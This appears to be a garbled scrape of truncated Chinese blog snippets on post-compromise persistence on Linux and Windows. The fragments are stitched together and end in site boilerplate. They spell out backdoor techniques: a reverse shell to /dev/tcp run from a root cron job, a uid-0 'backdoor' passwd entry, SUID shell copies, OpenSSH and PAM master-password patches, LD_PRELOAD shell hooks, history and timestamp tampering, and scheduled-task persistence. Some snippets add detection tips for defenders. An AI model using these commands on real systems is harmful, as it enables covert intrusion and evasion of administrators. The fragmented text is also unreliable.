后门补丁包,解压后,将后门补丁文件sshbd5.9p1.diff打入openssh5.9本体中: 修改inlucde.h中的SECRETPW参数: 配置安装路径和编译安装: 靶机版本为kali linux
1.隐藏踪迹创建隐藏文件(ls不可见,ls -la可见):vim .shell.php修改时间戳(文件时间):touch -r 老文件 shell.elf文件锁定(赋予特殊权限,不允许更改):chattr...to-port 22ssh连接80端口ssh -p 80 root@IP历史命令记录隐藏:set +o history,停止记录history,查看记录history -d 序号,删除记录2.添加root权限用户直接添加...IP -p 77776.ssh wrapper先开启ssh,将原本的sshd移位systemctl start sshd.servicecd /usr/sbin/mv sshd /重写一个sshd,赋予权限...' > /shell.shecho 'bash -i >& /dev/tcp/IP/6666 0>&1' >> /shell.shchmod +sx /etc/shell.sh添加一分钟一次的root权限计划任务
d在我们攻防当中,常常会碰到linux机器,拿到之后为了避免发现 低权限升高权限 创建一个c文件 #include int main() { setuid(0);...include int main(int argc,char* argv[]) { setuid(0); system(argv[1]); return 0; } 在高权限用户下编译...,并赋予权限 gcc -o rt hm.c chmod +s rt
在渗透过程中拿到目标权限只是开始,通常会留下后门以便再次访问(简称APT)。因此需要进行权限维持,隐藏后门。本文将对Linux下常见的权限维持后门技术进行解析,知己知彼百战不殆。...密码为Poker echo "backdoor:AALvujjdsfdsf:0:0:me:/root:/bin/bash">>/etc/passwd #Aalv…为第一行命令执行结果 2.设置suid权限位...原理:设置了suid权限位的文件在执行时具有该文件拥有者的权限,故我们可以在root权限时留一个bash文件后门,使得在低权限时能够通过该后门获得root权限 cp /bin/bash /tmp/test...(不通操作系统文件不同) 4.写入SSH公钥 原理:Linux主机打开了SSH时默认也开启了密钥登陆,故写入ssh公钥,即可留下一条控制系统的路 ssh-keygen -t rsa #生成ssh密钥对...则会修改目录下root文件,也相当于crontab -e 还有许多其它执行计划任务的文件及相关文件 11.预加载动态链接库 原理:系统执行一些命令的时候,在真正执行其文件之前,会加载相应的动态链接库,但linux
更新时间:2022年12月06日11:43:20 目的 本文主要是学习linux下的权限维持的方法,本文因为写的时间很久了,文章有点乱。...本文仅对linux的权限维持做了非常微小的学习,文中会从攻和防的角度,在借助学习其它文章的前提下进行学习。 文章所有的操作都是网上已有的技术,仅供参考,如有错误,欢迎指正。 1....权限维持方法 2.1 添加用户 这个操作先在反弹bash的攻击机上进行:先看下当前已有的历史命令,这是反弹回来的操作命令: 也可以使用这个指令看下: image.png 再看下当前的passwd和shadow.../tmp/su -> /usr/sbin/sshd [root@linux-centos /]# ll ....3.总结 本文仅对linux的权限维持做了非常微小的学习,文章所有的操作都是网上已有的技术,仅供参考,如有错误,欢迎指正。 4.参考资料 其中还有一部分参考的文章链接在文中。
有趣的 LD_PRELOAD 前言 LD_PRELOAD 是 Linux 系统中的一个环境变量,它可以影响程序的运行时的链接(Runtime linker),它允许你定义在程序运行前优先加载的动态链接库...LD_PRELOAD LD_PRELOAD 是 Linux 系统中的一个环境变量,它可以影响程序的运行时的链接(Runtime linker),它允许你定义在程序运行前优先加载的动态链接库。...利用这种思路,我们可以制作一个隐藏得 Linux 后门,比如当管理员执行 ls 命令时会反弹一个 Shell: •hook_strncmp.c #include#include权限error_log("", 1, "", "");?...> 对于 bypass_disablefunc.php,权限上传到 Web 目录的直接访问,无权限的话可以传到 tmp 目录后用include 等函数来包含,并且需要用 GET 方法提供三个参数: •cmd
目录 0x01 隐藏文件 0x02 隐藏文件时间戳 0x03 隐藏权限 0x04 隐藏历史操作命令 技巧一:只针对你的工作关闭历史记录 技巧二:从历史记录中删除指定的命令 0x05 进程隐藏 第一种方法...:libprocesshider 0x01 隐藏文件 Linux 下创建一个隐藏文件:touch .test.txt touch 命令可以创建一个文件,文件名前面加一个 点 就代表是隐藏文件 一般的Linux...下的隐藏目录使用命令ls -l是查看不出来的,只能查看到文件及文件夹,查看Linux下的隐藏文件需要用到命令:ls -al 这里,我们可以看到在/tmp下,默认存在多个隐藏目录,这些目录是恶意文件常用来藏身的地方...touch -t 2001021042.30 1.php 0x03 隐藏权限 在Linux中,使用chattr命令来防止root和其他管理用户误删除和修改重要文件及目录,此权限用ls -l是查看不出来的...,从而达到隐藏权限的目的。
Linux权限维持|内网渗透学习(十二) 都是一些偷袭留后门的小技巧, 有哪些内容的话看目录吧 SSH 后门 软链接sshd 输入任意密码就可以root用户权限登陆﹐如果root用户被禁止登陆时﹐可以利用其他存在的用户身份登陆...target_ip /bin/bash -i ssh -o UserKnownHostsFile=/dev/null -T root@target_ip 通过上面两种命令方式登录是不会被记录的从而实现隐身登录 Linux...隐藏技术 简单隐藏 就是直接将文件名设为.开头 隐藏权限(文件加锁) chattr命令可以给文件枷锁, 防止被删除 chattr +i ..../usr/bin/passwd, 如果一般用户执行该文件, 则在执行过程中该文件可以获得root权限, 从而可以更改用户的密码....我们只要nc连接端口即可获得shell 开启一个体验更好的虚拟终端: python -c "import pty;pty.spawn('/bin/bash')" PROMPT_COMMAND 后门 Linux
攻击者在获取系统权限后,通常会留下后门以便再次访问。本文将对Linux下常见的权限维持技术进行解析,知己知彼百战不殆。...Shell Suid shell是一种可用于以拥有者权限运行的shell。...# 配合普通用户权限使用cp /bin/bash /tmp/shellchmod u+s /tmp/shell 使用guest用户登录就可疑获取root权限。 ?...排查技巧: # 在Linux中查找SUID设置的文件find . -perm /4000# 在Linux中查找使用SGID设置的文件find ....PAM最初是集成在Solaris中,目前已移植到其它系统中,如Linux、SunOS、HP-UX 9.0等。
/library/ wget http://www.linux-pam.org/library/Linux-PAM-1.1.8.tar.gz tar -xzvf Linux-PAM-1.1.8.tar.gz.../Linux-PAM-1.1.8/modules/pam_unix/pam_unix_auth.c ?...替换原有 PAM 模块,添加后门 cd Linux-PAM-1.1.8 编译 PAM 源码 ..../configure && make 备份原有 PAM 模块 mv /lib/x86_64-linux-gnu/security/pam_unix.so /lib/x86_64-linux-gnu/security...目标机本地使用 赋予非特权用户以 root 权限 /reptile/reptile_cmd root 隐藏显示文件,目录和内核模块 名称中具有关键字 reptile 的所有文件和文件夹将被隐藏,关键字可以在安装之前进行配置
今年的红队评分标准,红队维持权限时间越久,得分越高,所以权限维持迫在眉睫。...包括存取和更改时间: touch -r index.php shell.php 2、文件锁定(权限隐藏) 在Linux中,使用chattr命令来防止root或者其他用户误删,这个权限是ls -l查看不出来的...,达到一个隐藏权限的目的。...cshm #修改cshm的密码 设置不允许root账户远程登录,参考链接:https://www.cnblogs.com/binblogs/p/5201307.html 第三种情况:不交互⽆回显添加Linux...2、执⾏者对于该程序需要具有x的可执⾏权限 3、本权限仅在执⾏该程序的过程中有效 4、在执⾏过程中执⾏者将具有该程序拥有者的权限 我们可以创建一个suid权限的文件 $cp /bin/bash /tmp
获取管理员hash 获得shell后,执行命令 getsystem 提高权限为管理员权限,接着执行命令 run post/windows/gather/hashdump 获取hash Administrator...:500:aad3b435b51404eeaad3b435b51404ee:bd75068c6729aacd2fe3497b43bb664e::: image.png 权限维持 执行命令 use exploit
Windows权限维持 目录 定时任务 创建隐蔽账号 进程迁移 启动目录 注册服务自启(报毒) 修改注册表实现自启动 在红蓝对抗实战中,当我们获取到一台Windows主机的权限后,首先要做的就是怎么维持住该权限...比如采取以下几点措施: 查杀木马进程 重启主机 断网 关闭主机 而对于我们维持权限,可以有以下几点: 定时任务 使用 schtasks 命令创建定时任务 在目标主机上创建一个名为test的计划任务,启动程序为...C:\vps.exe,启动权限为system,启动时间为每隔一小时启动一次。...findstr test 启动该test计划任务 schtasks /run /i /tn "test" 删除该test计划任务 schtasks /delete /tn "test" /f 如果当期用户权限是普通权限那么...如果是管理员权限,可以指定为 system。 但是如果目标主机有杀软的话会报毒 所以,要想绕过杀入软件创建计划任务的话,有这么一个思路。利用VBS脚本创建计划任务,然后执行该VBS脚本即可。
0x00 前言 攻击者在获取服务器权限后,会通过一些技巧来隐藏自己的踪迹和后门文件,本文介绍Linux下的几种隐藏技术。...如 /temp/.ICE-unix/、/temp/.Test-unix/、/temp/.X11-unix/、/temp/.XIM-unix/ 0x02 隐藏权限 在Linux中,使用chattr命令来防止...root和其他管理用户误删除和修改重要文件及目录,此权限用ls -l是查看不出来的,从而达到隐藏权限的目的。...第二种方法:进程注入工具linux-inject linux-inject是用于将共享对象注入Linux进程的工具 github项目地址: https://github.com/gaffe23/linux-inject.git...# 下载程序编译git clone https://github.com/gaffe23/linux-inject.gitcd linux-inject && make# 测试进程.
文章前言 本篇文章主要介绍如何通过证书服务来实现权限维持的目的 基本原理 在微软的文档里有一段话"当使用PKCA时,KDC在权限属性证书(PAC)中会返回用户的NTLM",也就是说当使用证书进行Kerberos...使用之前的证书依旧可以窃取的用户的NTLM Hash tgt::pac /subject:Al1ex /castore:current_user /domain:hacke.testlab 文末小结 本篇文章主要介绍了ADCS在权限维持方面的应用...,其实ADCS还可以用于权限提升、中级攻击等多维度,后续有机会在进行逐一分享
---- 权限维持方法小结 前言 小结下权限维持方法 一、Windows 1、密码记录工具 (1)WinlogonHack WinlogonHack 是一款用来劫取远程3389登录密码的工具,在 WinlogonHack...master/powershell/MyShell/Backdoor/LNK_backdoor.ps1 (3)利用BHO实现IE浏览器劫持 参考:利用BHO实现IE浏览器劫持 (4).NET后渗透下的权限维持...(1)利用LD_PRELOAD 可参考: LINUX LD_PRELOAD提权 使用LD_Preload的Linux权限升级技巧 检测 echo $LD_PRELOAD #默认无输出,如果有输出就需要去看下文件是否为异常文件了...可参考: linux进程注入 linux一种无文件后门技巧 GitHub存在大量开源工具,比如: linux-inject,主要原理是使用ptrace向进程中注入恶意so文件 #....使用相关检测工具,比如:unhide 11、一些工具 https://github.com/Screetsec/Vegile https://github.com/icco/backdoor 结语 后门和权限维持的一些方法
乌鸦安全拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经允许,禁止转载! 本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!...,并将该用户添加到管理员组: 重启机器登录: 3.5 获取原用户密码 登录test2后之后,使用工具mimikatz工具将所有用户的密码dump下来: privilege::debug 提取权限
WMI利用 (权限维持) 讲在前面 作者:pingpig@深蓝攻防实验室 在简单了解了WMI后,我们开始了横向移动,包括其中的信息收集,工具利用。...那么在我们短暂的获取权限后,如何才能将权限持久化,也就是所说的权限维持住呢?...笔者看了国内外部分文章后,发现WMI做权限维持主要是介绍WMI事件,并将其分为永久事件和临时事件,本文参考部分博客文章对WMI事件进行讲解,不足之处,望及时指出。...所以在权限维持中一般我们使用WMI永久事件来进行。
技术篇 对常见的权限维持的技术原理、实现方法、检测技巧进行总结、复现。...除了上面的位置之外还有下面的位置,可以让我们实现权限维持: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce HKEY_CURRENT_USER...所以我们可以依靠这个注册表来进行权限维持。...在使用wmi进行权限维持的时候,我们一般用到下面的三个类: __EventFilter EventConsumer __FilterToConsumerBinding 下面我们看下他的利用方式,首先是...Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f 修改系统服务 使用sc制作权限维持
工具介绍 通过渗透拿到权限之后,为了不让权限丢失,都会进行权限维持,而在进行权限维持的时候,红队需要花费大量的时候,来验证是否合适,因此在这款工具就诞生 HackerPermKeeper[黑客权限保持者...] 查看下面的表格可以知道生成的权限维持文件可以运行的python版本,但是这个项目本身是python3运行的[我自己的环境是Python 3.9.7] 权限的划分 快速使用 python3运行此项目...[我自己的环境是Python 3.9.7],但是运行权限维持模块脚本请看上面的表格 安装依赖 pip install -r requirements.txt 快速判断目标机器适合的权限维持模块,运行...python main.py -c 1 查看权限维持模详细块信息 python main.py -c 2 使用此项目生成权限维持脚本[在这之前,请先运行check.py脚本判断出目标机器适合什么类型权限维持的脚本...video/BV1fV411N7Qc/ 常见后门介绍 OpenSSH后门万能密码&记录密码(这个需要依赖环境),就是把对方的门换个锁,但是原来的钥匙也可以使用 发现程度:|| PAM后门,PAM是一个Linux
领取专属 10元无门槛券
手把手带您无忧上云